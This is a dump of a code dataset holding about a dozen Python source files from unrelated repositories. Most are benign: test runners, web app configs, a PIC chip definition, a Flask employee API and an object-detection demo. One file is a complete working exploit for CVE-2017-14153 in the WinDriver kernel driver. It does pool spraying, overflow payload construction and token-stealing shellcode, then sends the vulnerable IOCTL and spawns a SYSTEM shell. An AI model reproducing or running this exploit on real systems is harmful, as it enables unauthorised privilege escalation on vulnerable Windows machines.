code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Integration testing runner for Variant Transforms' Preprocessor pipeline.
To define a new preprocessor_tests integration test case, create a json file in
gcp_variant_transforms/testing/integration/preprocessor_tests directory and
specify at least test_name, blob_name and expected_contents
for the integration test.
Execute the following command from the root source directory:
python gcp_variant_transforms/testing/integration/run_preprocessor_tests.py \
--project gcp-variant-transforms-test \
--region us-central1 \
--staging_location gs://integration_test_runs/staging \
--temp_location gs://integration_test_runs/temp \
--logging_location gs://integration_test_runs/temp/integration_test_logs
To keep the reports that this test creates, use the --keep_reports option.
It runs all integration tests inside
`gcp_variant_transforms/testing/integration/preprocessor_tests`.
"""
import argparse
import os
import sys
from datetime import datetime
from typing import Dict, List # pylint: disable=unused-import
from apache_beam.io import filesystems
from google.cloud import storage
from gcp_variant_transforms.testing.integration import run_tests_common
# GCS bucket that holds test inputs and receives generated reports/headers.
_BUCKET_NAME = 'integration_test_runs'
# Variant Transforms tool under test.
_TOOL_NAME = 'vcf_to_bq_preprocess'
# Directory containing the JSON test-case configs.
_TEST_FOLDER = 'gcp_variant_transforms/testing/integration/preprocessor_tests'
class PreprocessorTestCase(run_tests_common.TestCaseInterface):
  """Test case that holds information to run in Pipelines API."""

  def __init__(self,
               parser_args,  # type: Namespace
               test_name,  # type: str
               expected_contents,  # type: List[str]
               report_blob_name,  # type: str
               header_blob_name=None,  # type: str
               **kwargs  # type: **str
              ):
    # type: (...) -> None
    self._keep_reports = parser_args.keep_reports
    self._name = test_name
    self._expected_contents = expected_contents
    # Timestamp suffix keeps concurrent runs from clobbering each other's
    # outputs in the shared bucket.
    suffix = '_integration_tests_{}'.format(
        datetime.now().strftime('%Y%m%d_%H%M%S'))
    self._report_blob_name = self._append_suffix(report_blob_name, suffix)
    # '/'-joining 'gs:/' with bucket and blob yields a gs://bucket/blob URL.
    self._report_path = '/'.join(['gs:/', _BUCKET_NAME, self._report_blob_name])
    self._project = parser_args.project
    args = ['--report_path {}'.format(self._report_path),
            '--staging_location {}'.format(parser_args.staging_location),
            '--temp_location {}'.format(parser_args.temp_location),
            # Dataflow job names may not contain underscores.
            '--job_name {}'.format(
                ''.join([test_name, suffix]).replace('_', '-'))]
    self._header_blob_name = None
    self._header_path = None
    if header_blob_name:
      # Optional: the test also validates the resolved-headers output file.
      self._header_blob_name = self._append_suffix(header_blob_name, suffix)
      self._header_path = '/'.join(['gs:/',
                                    _BUCKET_NAME,
                                    self._header_blob_name])
      args.append('--resolved_headers_path {}'.format(self._header_path))
    # Forward any extra per-test config entries as flags verbatim.
    for k, v in kwargs.items():
      args.append('--{} {}'.format(k, v))
    self.run_test_command = run_tests_common.form_command(
        parser_args.project,
        parser_args.region,
        filesystems.FileSystems.join(parser_args.logging_location,
                                     self._report_blob_name),
        parser_args.image, parser_args.sdk_container_image, _TOOL_NAME, args)

  def validate_result(self):
    """Validates the results.

    - Checks that the report is generated.
    - Validates report's contents are the same as `expected_contents`.
    - Checks that the resolved headers are generated if `header_blob_name` is
      specified in the test.

    Raises:
      run_tests_common.TestCaseFailure: If the report (or expected resolved
        headers) is missing, or the report contents mismatch.
    """
    client = storage.Client(self._project)
    bucket = client.get_bucket(_BUCKET_NAME)
    report_blob = bucket.get_blob(self._report_blob_name)
    if not report_blob:
      raise run_tests_common.TestCaseFailure(
          'Report is not generated in {} in test {}'.format(self._report_path,
                                                            self._name))
    contents = report_blob.download_as_string().decode('utf-8')
    expected_contents = '\n'.join(self._expected_contents)
    if expected_contents != contents:
      raise run_tests_common.TestCaseFailure(
          'Contents mismatch: expected {}, got {} in test {}'.format(
              expected_contents, contents, self._name))
    # Unless --keep_reports was passed, clean up generated artifacts.
    if not self._keep_reports:
      report_blob.delete()
    if self._header_blob_name:
      resolved_headers_blob = bucket.get_blob(self._header_blob_name)
      if not resolved_headers_blob:
        raise run_tests_common.TestCaseFailure(
            'The resolved header is not generated in {} in test {}'.format(
                self._header_path, self._name))
      if not self._keep_reports:
        resolved_headers_blob.delete()

  def get_name(self):
    # type: () -> str
    """Returns the test case's name."""
    return self._name

  def _append_suffix(self, file_path, suffix):
    # type: (str, str) -> str
    """Inserts `suffix` between the file name and its extension."""
    file_name, file_extension = os.path.splitext(file_path)
    return ''.join([file_name, suffix, file_extension])
def _get_args():
  # type: () -> argparse.Namespace
  """Parses command-line arguments for the preprocessor test runner."""
  parser = argparse.ArgumentParser()
  run_tests_common.add_args(parser)
  # FIX: `type=bool` is a known argparse pitfall — bool('False') is True, so
  # any explicit value was coerced to True anyway. `action='store_true'`
  # implements the intended plain-flag semantics (default False, flag True)
  # and stays compatible with the documented `--keep_reports` usage.
  parser.add_argument('--keep_reports',
                      action='store_true',
                      help=('If set, generated reports and resolved headers '
                            'are not deleted.'))
  return parser.parse_args()
def _get_test_configs():
  # type: () -> List[List[Dict]]
  """Collects every test config found under preprocessor_tests."""
  config_dir = os.path.join(os.getcwd(), _TEST_FOLDER)
  # Each config must name the test, its report blob and expected contents.
  return run_tests_common.get_configs(
      config_dir, ['test_name', 'report_blob_name', 'expected_contents'])
def main():
  """Runs the integration tests for preprocessor."""
  args = _get_args()
  # Build one PreprocessorTestCase per config, preserving the grouping of
  # configs into test-case groups.
  tests = [
      [PreprocessorTestCase(args, **config) for config in case_group]
      for case_group in _get_test_configs()
  ]
  runner = run_tests_common.TestRunner(tests)
  runner.run()
  return runner.print_results()
if __name__ == '__main__':
  print('Starting preprocessor tests...')
  ret_code = main()
  # NOTE(review): this message prints even when main() returned a non-zero
  # code; "successfully" only means the runner itself did not crash.
  print('Finished all preprocessor tests successfully.')
  sys.exit(ret_code)
|
googlegenomics/gcp-variant-transforms
|
gcp_variant_transforms/testing/integration/run_preprocessor_tests.py
|
Python
|
apache-2.0
| 6,857
|
from django.conf.urls import patterns, include, url

# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()

# NOTE(review): `patterns()` was deprecated in Django 1.8 and removed in 1.10;
# on modern Django, `urlpatterns` must be a plain list of url() entries.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'djfreeradmin.views.home', name='home'),
    # url(r'^djfreeradmin/', include('djfreeradmin.foo.urls')),

    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),

    # Route everything at the site root to the admin.
    url(r'^', include(admin.site.urls)),
)
|
alb-i986/django-freeradmin
|
djfreeradmin/urls.py
|
Python
|
mit
| 510
|
"""
WSGI config for offenewahlen_nrw17 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "offenewahlen_api.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
# Fix django closing connection to MemCachier after every request (#11331)
from django.core.cache.backends.memcached import BaseMemcachedCache
BaseMemcachedCache.close = lambda self, **kwargs: None
|
OKFNat/offenewahlen-nrw17
|
src/offenewahlen_api/wsgi.py
|
Python
|
mit
| 701
|
"""
# TOP2049 Open Source programming suite
#
# Microchip PIC18F2321 DIP28
#
# Copyright (c) 2013 Pavel Stemberk <stemberk@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
from .microchip8_18f2221family import *
class Chip_PIC18F2321dip28(microchip8_18f2221family):
	"""PIC18F2321 in a DIP28 package, programmed via the 18F2221 family code."""

	# Chip has on-die EEPROM data memory.
	hasEEPROM = True
	# Write/erase buffer granularities, in bytes.
	writeBufferSize = 8
	eraseBufferSize = 64

	def __init__(self):
		# Package geometry, programming pins and memory layout for DIP28.
		microchip8_18f2221family.__init__(self,
			chipPackage="DIP28",
			chipPinVCC=20,
			chipPinsVPP=1,
			chipPinGND=19,
			signature=b"\x22\x21",
			flashPageSize=0x2000,
			flashPages=1,
			eepromPageSize=0x100,
			eepromPages=1,
			fuseBytes=14
		)
# Configuration ("fuse") bit descriptions. The first BitDescription argument
# is the octal bit index within the config-byte area; "NA" marks bits that
# are unimplemented (or unused on this device variant).
fuseDesc = (
	BitDescription(0o00, "NA"),
	BitDescription(0o01, "NA"),
	BitDescription(0o02, "NA"),
	BitDescription(0o03, "NA"),
	BitDescription(0o04, "NA"),
	BitDescription(0o05, "NA"),
	BitDescription(0o06, "NA"),
	BitDescription(0o07, "NA"),
	BitDescription(0o10, "FOSC[0], 0000=LP, 1000=internal RC oscillator, RA6=CLKO"),
	BitDescription(0o11, "FOSC[1]"),
	BitDescription(0o12, "FOSC[2]"),
	BitDescription(0o13, "FOSC[3]"),
	BitDescription(0o14, "NA"),
	BitDescription(0o15, "NA"),
	BitDescription(0o16, "FCMEN, 0=Fail-Safe Clock Monitor is disabled"),
	BitDescription(0o17, "IESO, 0=Internal/External Switchover mode is disabled"),
	BitDescription(0o20, "nPWRTEN"),
	BitDescription(0o21, "BOREN[0]"),
	BitDescription(0o22, "BOREN[1]"),
	BitDescription(0o23, "BORV[0]"),
	BitDescription(0o24, "BORV[1]"),
	BitDescription(0o25, "NA"),
	BitDescription(0o26, "NA"),
	BitDescription(0o27, "NA"),
	BitDescription(0o30, "WDTEN, 0=WDT disabled, 1=WDT enabled"),
	BitDescription(0o31, "WDTPS[0]"),
	BitDescription(0o32, "WDTPS[1]"),
	BitDescription(0o33, "WDTPS[2]"),
	BitDescription(0o34, "WDTPS[3]"),
	BitDescription(0o35, "NA"),
	BitDescription(0o36, "NA"),
	BitDescription(0o37, "NA"),
	BitDescription(0o40, "NA"),
	BitDescription(0o41, "NA"),
	BitDescription(0o42, "NA"),
	BitDescription(0o43, "NA"),
	BitDescription(0o44, "NA"),
	BitDescription(0o45, "NA"),
	BitDescription(0o46, "NA"),
	BitDescription(0o47, "NA"),
	BitDescription(0o50, "NA"),
	BitDescription(0o51, "PBADEN"),
	BitDescription(0o52, "LPT1OSC"),
	BitDescription(0o53, "NA"),
	BitDescription(0o54, "NA"),
	BitDescription(0o55, "NA"),
	BitDescription(0o56, "NA"),
	BitDescription(0o57, "MCLRE"),
	BitDescription(0o60, "STVREN"),
	BitDescription(0o61, "NA"),
	BitDescription(0o62, "LVP"),
	BitDescription(0o63, "NA"),
	BitDescription(0o64, "BBSIZ[0]"),
	BitDescription(0o65, "BBSIZ[1]"),
	BitDescription(0o66, "XINST"),
	BitDescription(0o67, "nDEBUG"),
	BitDescription(0o70, "NA"),
	BitDescription(0o71, "NA"),
	BitDescription(0o72, "NA"),
	BitDescription(0o73, "NA"),
	BitDescription(0o74, "NA"),
	BitDescription(0o75, "NA"),
	BitDescription(0o76, "NA"),
	BitDescription(0o77, "NA"),
	BitDescription(0o100, "CP[0]"),
	BitDescription(0o101, "CP[1]"),
	BitDescription(0o102, "CP[2]/NA"),
	BitDescription(0o103, "CP[3]/NA"),
	BitDescription(0o104, "CP[4]/NA"),
	BitDescription(0o105, "CP[5]/NA"),
	BitDescription(0o106, "NA"),
	BitDescription(0o107, "NA"),
	BitDescription(0o110, "NA"),
	BitDescription(0o111, "NA"),
	BitDescription(0o112, "NA"),
	BitDescription(0o113, "NA"),
	BitDescription(0o114, "NA"),
	BitDescription(0o115, "NA"),
	BitDescription(0o116, "CPB"),
	BitDescription(0o117, "CPD"),
	BitDescription(0o120, "WRT[0]"),
	BitDescription(0o121, "WRT[1]"),
	BitDescription(0o122, "WRT[2]/NA"),
	BitDescription(0o123, "WRT[3]/NA"),
	BitDescription(0o124, "WRT[4]/NA"),
	BitDescription(0o125, "WRT[5]/NA"),
	BitDescription(0o126, "NA"),
	BitDescription(0o127, "NA"),
	BitDescription(0o130, "NA"),
	BitDescription(0o131, "NA"),
	BitDescription(0o132, "NA"),
	BitDescription(0o133, "NA"),
	BitDescription(0o134, "NA"),
	BitDescription(0o135, "WRTC"),
	BitDescription(0o136, "WRTB"),
	BitDescription(0o137, "WRTD"),
	BitDescription(0o140, "EBTR[0]"),
	BitDescription(0o141, "EBTR[1]"),
	BitDescription(0o142, "EBTR[2]/NA"),
	BitDescription(0o143, "EBTR[3]/NA"),
	BitDescription(0o144, "EBTR[4]/NA"),
	BitDescription(0o145, "EBTR[5]/NA"),
	BitDescription(0o146, "NA"),
	BitDescription(0o147, "NA"),
	BitDescription(0o150, "NA"),
	BitDescription(0o151, "NA"),
	BitDescription(0o152, "NA"),
	BitDescription(0o153, "NA"),
	BitDescription(0o154, "NA"),
	BitDescription(0o155, "NA"),
	BitDescription(0o156, "EBTRB"),
	BitDescription(0o157, "NA"),
)
# Register this chip (and its FPGA bitfile) with the programmer framework.
ChipDescription(
	Chip_PIC18F2321dip28,
	bitfile="microchip01dip28",
	chipID="PIC18F2321dip28",
	runtimeID=(0xDE07, 0x01),
	chipVendors="Microchip",
	description="PIC18F2321",
	packages=(("DIP28", ""),),
	fuseDesc=fuseDesc,
	maintainer="Pavel Stemberk <stemberk@gmail.com>",
)
|
mbuesch/toprammer
|
libtoprammer/chips/microchip8/pic18f2321dip28.py
|
Python
|
gpl-2.0
| 5,349
|
from weppy import AppModule
from weppy.tools import ServiceHandler
from starter_weppy import app
# Mount this controller under the /api prefix; serialize responses as JSON.
api = AppModule(app, 'api', __name__, url_prefix='api')
api.common_handlers = [ServiceHandler('json')]


@api.route()
def version():
    """Return the current API version wrapped in a status envelope."""
    # Renamed local from `json` to avoid shadowing the stdlib module name.
    payload = {
        'version': 'v1'
    }
    return dict(status='OK', data=payload)
|
mijdavis2/starter_weppy
|
starter_weppy/controllers/api/api.py
|
Python
|
mit
| 314
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from fuelclient.commands import base
from fuelclient.commands import environment as env_commands
class EnvMoveNode(env_commands.EnvMixIn, base.BaseCommand):
    """Update node assignment."""

    def get_parser(self, prog_name):
        """Extends the base parser with node_id/env_id positional arguments."""
        parser = super(EnvMoveNode, self).get_parser(prog_name)
        parser.add_argument('node_id',
                            type=int,
                            help='ID of the node to upgrade.')
        # env_id stays a string: it is only interpolated into the URL below.
        parser.add_argument('env_id',
                            type=str,
                            help='ID of the environment.')
        return parser

    def take_action(self, parsed_args):
        """POSTs the node reassignment to the cluster's upgrade/assign API."""
        # TODO(akscram): While the clone procedure is not a part of
        #                fuelclient.objects.Environment the connection
        #                will be called directly.
        self.client._entity_wrapper.connection.post_request(
            "clusters/{0}/upgrade/assign".format(parsed_args.env_id),
            {
                'node_id': parsed_args.node_id,
            }
        )
        msg = ('Node {node_id} successfully relocated to the environment'
               ' {env_id}.\n'.format(
                   node_id=parsed_args.node_id,
                   env_id=parsed_args.env_id,
               ))
        self.app.stdout.write(msg)
|
Mirantis/octane
|
octane/fuelclient/move_node.py
|
Python
|
apache-2.0
| 1,844
|
from socket import *
import threading

# AF_UNIX does not exist on Windows; fall back to loopback TCP there.
try:
    pairfamily = AF_UNIX
except NameError:
    pairfamily = AF_INET


def SocketPair(family=pairfamily, type_=SOCK_STREAM, proto=IPPROTO_IP):
    """Wraps socketpair() to support Windows using local ephemeral ports"""
    try:
        # POSIX fast path: the OS creates a connected pair directly.
        sock1, sock2 = socketpair(family, type_, proto)
        return (sock1, sock2)
    except NameError:
        # Windows has no socketpair(): emulate it by connecting to a local
        # ephemeral port from a background thread while accept()-ing here.
        listensock = socket(family, type_, proto)
        listensock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listensock.bind(('localhost', 0))
        _iface, ephport = listensock.getsockname()
        listensock.listen(1)
        sock1 = socket(family, type_, proto)
        # FIX: pass daemon=True at construction instead of the deprecated
        # Thread.setDaemon(1), so a stuck connect cannot block interpreter
        # exit.
        connthread = threading.Thread(
            target=pairConnect, args=[sock1, ephport], daemon=True)
        connthread.start()
        sock2, _sock2addr = listensock.accept()
        listensock.close()
        return (sock1, sock2)


def pairConnect(sock, port):
    """Connect *sock* to localhost:*port* (runs on the helper thread)."""
    sock.connect(('localhost', port))
|
ActiveState/code
|
recipes/Python/525487_Extending_socketsocketpair_work/recipe-525487.py
|
Python
|
mit
| 970
|
from contextlib import contextmanager
from fabric.context_managers import settings, hide
from fabric.state import env
from refabric.state import apply_role_definitions
@contextmanager
def sudo(user=None):
    """Run wrapped commands via sudo as *user* (default: env sudo_user/user)."""
    with settings(sudo_user=user or env.sudo_user or env.user, use_sudo=True):
        yield
@contextmanager
def role(name):
    """Scope fabric's role list to *name*, re-applying definitions on exit."""
    with settings(roles=[name]):
        yield
    # NOTE(review): this runs only when the block exits normally — it is
    # skipped if the block raises (no try/finally). Confirm that asymmetry
    # is intended.
    apply_role_definitions(None)
# FIX: PEP 8 (E731) — named `def`s instead of lambda assignments; behavior
# and call signatures are unchanged.
def silent(*h):
    """Settings context: hide 'commands' (plus *h) output, warn on errors."""
    return settings(hide('commands', *h), warn_only=True)


def hide_prefix():
    """Settings context that disables fabric's output prefix."""
    return settings(output_prefix=False)


def abort_on_error():
    """Settings context that aborts (instead of warning) on command failure."""
    return settings(warn_only=False)
|
5monkeys/refabric
|
refabric/context_managers.py
|
Python
|
mit
| 591
|
from kex import *
from ctypes import *
from ctypes.wintypes import *
import os

if __name__ == '__main__':
    # Python 2 exploit script; helpers (kernel32, find_object_to_spray,
    # alloc_memory, tokenstealing, ...) come from the star-imported kex module.
    print "[*] WinDriver 12.40 and 12.50 pool overflow privilige escalation"
    print "[*] CVE-2017-14153"

    # Vulnerable IOCTL code and device name of the WinDriver kernel driver.
    IOCTL_VULN = 0x953824b7
    DEVICE_NAME = "\\\\.\\WinDrvr1240"
    dwReturn = c_ulong()

    print '[*] Trying WinDrvr1240'
    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    if driver_handle == INVALID_HANDLE_VALUE:
        # 12.40 device missing: retry with the 12.50 device name.
        DEVICE_NAME = "\\\\.\\WinDrvr1250"
        print '[*] WinDrvr1240 was not found, trying WinDrvr1250'
        driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
        if driver_handle == INVALID_HANDLE_VALUE:
            print "[-] Coudn't open driver, tried WinDrvr1240 and WinDrvr1250"
            sys.exit(-1)

    # Size of the pool hole to carve with sprayed objects.
    required_hole_size = 0x460
    good_object = find_object_to_spray(required_hole_size)

    # allocate input
    size = required_hole_size + len(pool_overwrite(required_hole_size,good_object))
    # source: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
    input = "\x41" * 0x18  # offset to size
    input += struct.pack("<I", 0x0000008d)  # controlled size (this triggers the overflow)
    input += "\x42" * (0x90 - len(input))  # padding to survive bsod
    input += struct.pack("<I", 0x00000000)  # use a NULL dword for sub_4196CA
    input += "\x43" * ((required_hole_size - 0x8) - len(input))  # fill our pool buffer
    input += pool_overwrite(required_hole_size,good_object)
    alloc_memory(0x41410000, input, size)

    # alloc pointer to CloseProcedure
    stuff = "\x42\x42\x42\x42"
    alloc_memory(0x00000060, stuff, 0x4)

    # allocate shellcode in memory (NOP-sled on both sides)
    SHELLCODE = tokenstealing(RETVAL = "")
    stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE))
    alloc_memory(0x42424242, stuff, size)

    # spray the heap with EventObjects
    gimme_the_hole(required_hole_size)

    inputbuffer = 0x41410000  # memory address of the input buffer
    inputbuffer_size = size
    outputbuffer_size = 0x0
    outputbuffer = None
    IoStatusBlock = c_ulong()

    if driver_handle:
        print "[+] Talking to the driver sending vulnerable IOCTL..."
        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
                                                None,
                                                None,
                                                None,
                                                byref(IoStatusBlock),
                                                IOCTL_VULN,
                                                inputbuffer,
                                                inputbuffer_size,
                                                outputbuffer,
                                                outputbuffer_size
                                                )
    close_all_handles()
    # Verify privilege escalation succeeded before spawning a shell.
    if shell32.IsUserAnAdmin():
        print "[+] We got SYSTEM!!"
        os.system('cmd.exe')
    else:
        print "[-] Something went wrong with the exploit, no SYSTEM"
|
theevilbit/kex
|
usage_examples/CVE-2017-14153_windrvr1240-50_win7x86.py
|
Python
|
mit
| 2,678
|
# encoding: utf-8
# module PyKDE4.kdeui
# from /usr/lib/python2.7/dist-packages/PyKDE4/kdeui.so
# by generator 1.135
# no doc
# imports
import PyKDE4.kdecore as __PyKDE4_kdecore
import PyQt4.QtCore as __PyQt4_QtCore
import PyQt4.QtGui as __PyQt4_QtGui
import PyQt4.QtSvg as __PyQt4_QtSvg
from KPixmapCache import KPixmapCache
class KIconCache(KPixmapCache):
    """Auto-generated IDE stub for PyKDE4's KIconCache.

    The stub generator could not recover signatures or docs from the binary
    module; all bodies are `pass` placeholders for introspection only.
    """
    def defaultIconSize(self, *args, **kwargs): # real signature unknown
        pass

    def deleteCache(self, *args, **kwargs): # real signature unknown
        pass

    def existingIconThemeDirs(self, *args, **kwargs): # real signature unknown
        pass

    def find(self, *args, **kwargs): # real signature unknown
        pass

    def insert(self, *args, **kwargs): # real signature unknown
        pass

    def loadCustomData(self, *args, **kwargs): # real signature unknown
        pass

    def loadCustomIndexHeader(self, *args, **kwargs): # real signature unknown
        pass

    def mostRecentMTime(self, *args, **kwargs): # real signature unknown
        pass

    def setThemeInfo(self, *args, **kwargs): # real signature unknown
        pass

    def writeCustomData(self, *args, **kwargs): # real signature unknown
        pass

    def writeCustomIndexHeader(self, *args, **kwargs): # real signature unknown
        pass

    def __init__(self, *args, **kwargs): # real signature unknown
        pass
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247972723/PyKDE4/kdeui/KIconCache.py
|
Python
|
gpl-2.0
| 1,404
|
#!/usr/bin/python3
# Employee API - v1.0
from opsapi import app
from flask import jsonify
from flask import request
from flask import g
"""
I prefer the BREAD acryonm: Browse, Read, Edit, Add and Delete
So to protect the scope of the entire application functions will
be named passenger_[bread_keyword]. This will avoid naming collisions
across our entire python module.
"""
# Get a list of employees (Browse) ===========================================
@app.route('/api/1.0/employee', methods=['GET'])
def employee_browse():
    """Return up to `limit` employee rows filtered on the `active` flag."""
    # The active flag shows only the 'non-deleted' items.
    # If you want to see everything pass active=0
    # FIX: defaults must be ints — werkzeug returns the default AS-IS
    # (without applying type=) when the query parameter is missing, so the
    # old string defaults ('1'/'10') were bound into the SQL unconverted.
    active = request.args.get('active', default=1, type=int)
    # It is a best practice to limit the amount of data an API will allow a
    # user to retrieve per call — this throttle protects the server. We
    # default to 10 but let callers ask for more via ?limit=.
    limit = request.args.get('limit', default=10, type=int)
    # Get the employee records (password deliberately not selected).
    g.c.execute('''SELECT rowid, name, email, active,
                   phone, message, status_id, date_created
                   FROM employee
                   WHERE active=?
                   LIMIT ?''', (active, limit))
    data = g.c.fetchall()
    # Send the data back as JSON
    return jsonify(data)
# Get the records of an employee (Read) ======================================
@app.route('/api/1.0/employee/<employee_id>', methods=['GET'])
def employee_read(employee_id):
    """Return one active employee's record (never the password)."""
    # FIX: the query previously referenced `passenger_id` — a name that does
    # not exist in this function (NameError on every request) — and passed it
    # bare instead of as a parameter sequence. Use the route's `employee_id`
    # wrapped in a 1-tuple.
    g.c.execute('''SELECT rowid, name, email, active,
                   phone, message, status_id, date_created
                   FROM employee
                   WHERE active = 1 AND rowid = ?''',
                (employee_id,))
    # Grabbing the one employee
    data = g.c.fetchone()
    # Return in JSON format
    return jsonify(data)
# Updates the records for an employee based on id (Edit) =====================
@app.route('/api/1.0/employee/<employee_id>', methods=['PUT'])
def employee_edit(employee_id):
    """Update an employee's profile fields; also re-activates the row."""
    # Get input from the user with the updated information
    name = request.form.get('name')
    email = request.form.get('email')
    phone = request.form.get('phone')
    message = request.form.get('message')
    status_id = request.form.get('status_id')
    # Tells user if they forget information
    if not name or not email or not phone or not message or not status_id:
        return jsonify({'Success': False, 'error': 'Missing Values'})
    # NOTE(review): password is not editable through this endpoint, and
    # active is forced back to 1 on every edit — confirm both are intended.
    g.c.execute('''UPDATE employee SET name=?, email=?,
                   phone=?, message=?, status_id=?, active=1
                   WHERE rowid=?''',
                (name, email, phone, message, status_id, employee_id))
    # Update the changes made to the database
    g.conn.commit()
    # Let the user know the changes were successful
    return jsonify({'Success': True, 'rowid':employee_id})
# Adds an employee (Add) =====================================================
@app.route('/api/1.0/employee', methods=['POST'])
def employee_add():
    """Create a new employee row from form fields; returns the new rowid."""
    # get user input
    name = request.form.get('name')
    email = request.form.get('email')
    phone = request.form.get('phone')
    password = request.form.get('password')
    message = request.form.get('message')
    status_id = request.form.get('status_id')
    date_created = request.form.get('date_created')
    # Tell the user if they forget a value
    if not name or not email or not phone or not password or not message or not status_id or not date_created:
        return jsonify({'Success': False, 'error': 'Missing Values'})
    # NOTE(review): the password is inserted as received (no hashing visible
    # in this module) and the INSERT relies on the table's column order,
    # with a literal 1 presumably filling the `active` column — confirm both
    # against the schema.
    g.c.execute('''INSERT INTO employee VALUES (?,?,?,?,?,?,?,?)''',
                (name, email, phone, password, message, status_id, 1,
                 date_created))
    # we get the id of the last item inserted
    rowid = g.c.lastrowid
    # Save changes to the database
    g.conn.commit()
    # Tell the user it was added
    return jsonify({'Success': True, 'rowid':rowid})
# Deletes an employee from the database (soft delete) ========================
@app.route('/api/1.0/employee/<employee_id>', methods=['DELETE'])
def employee_delete(employee_id):
    """Soft-delete an employee by clearing its active flag."""
    # FIX: SQL parameters must be a sequence of values. Passing the bare
    # string made the DB-API treat each *character* as a parameter, which
    # only happened to work for single-digit rowids.
    g.c.execute('''UPDATE employee SET active=0 WHERE rowid=?''',
                (employee_id,))
    # Push changes to database
    g.conn.commit()
    # FIX: the view previously returned None, which Flask rejects with a
    # server error; return a success envelope like the sibling endpoints.
    return jsonify({'Success': True, 'rowid': employee_id})
|
roguefalcon/rpi_docker_images
|
hackmt_2018_code/opsapi/opsapi/employee.py
|
Python
|
gpl-3.0
| 4,177
|
# Copyright © 2020 Arm Ltd and Contributors. All rights reserved.
# SPDX-License-Identifier: MIT
"""
Object detection demo that takes a video stream from a device, runs inference
on each frame producing bounding boxes and labels around detected objects,
and displays a window with the latest processed frame.
"""
import os
import sys
script_dir = os.path.dirname(__file__)
sys.path.insert(1, os.path.join(script_dir, '..', 'common'))
import cv2
from argparse import ArgumentParser
from ssd import ssd_processing, ssd_resize_factor
from yolo import yolo_processing, yolo_resize_factor
from utils import dict_labels
from cv_utils import init_video_stream_capture, preprocess, draw_bounding_boxes
from network_executor import ArmnnNetworkExecutor
def get_model_processing(model_name: str, video: cv2.VideoCapture, input_binding_info: tuple):
    """
    Gets model-specific decoding/processing helpers.
    The user can include their own network and functions by adding another statement.

    Args:
        model_name: Name of type of supported model.
        video: Video capture object, contains information about data source.
        input_binding_info: Contains shape of model input layer, used for scaling bounding boxes.

    Returns:
        Tuple of (output-decoding function, resize factor). Note: labels are
        NOT returned here — the caller loads them separately via dict_labels.

    Raises:
        ValueError: If `model_name` is not one of the supported models.
    """
    if model_name == 'ssd_mobilenet_v1':
        return ssd_processing, ssd_resize_factor(video)
    elif model_name == 'yolo_v3_tiny':
        return yolo_processing, yolo_resize_factor(video, input_binding_info)
    else:
        raise ValueError(f'{model_name} is not a valid model name')
def main(args):
    """Run the object-detection demo loop until the Esc key is pressed."""
    video = init_video_stream_capture(args.video_source)
    executor = ArmnnNetworkExecutor(args.model_file_path, args.preferred_backends)
    model_name = args.model_name
    process_output, resize_factor = get_model_processing(
        args.model_name, video, executor.input_binding_info)
    labels = dict_labels(args.label_path, include_rgb=True)

    while True:
        frame_present, frame = video.read()
        # FIX: check the read succeeded *before* flipping — on a failed read
        # `frame` is None and cv2.flip raised an unrelated OpenCV error
        # instead of the intended RuntimeError.
        if not frame_present:
            raise RuntimeError('Error reading frame from video stream')
        frame = cv2.flip(frame, 1)  # Horizontally flip the frame
        # SSD MobileNet expects normalised input (flag True); YOLO does not.
        if model_name == "ssd_mobilenet_v1":
            input_tensors = preprocess(frame, executor.input_binding_info, True)
        else:
            input_tensors = preprocess(frame, executor.input_binding_info, False)
        print("Running inference...")
        output_result = executor.run(input_tensors)
        detections = process_output(output_result)
        draw_bounding_boxes(frame, detections, resize_factor, labels)
        cv2.imshow('PyArmNN Object Detection Demo', frame)
        if cv2.waitKey(1) == 27:  # Esc
            print('\nExit key activated. Closing video...')
            break
    video.release()
    cv2.destroyAllWindows()
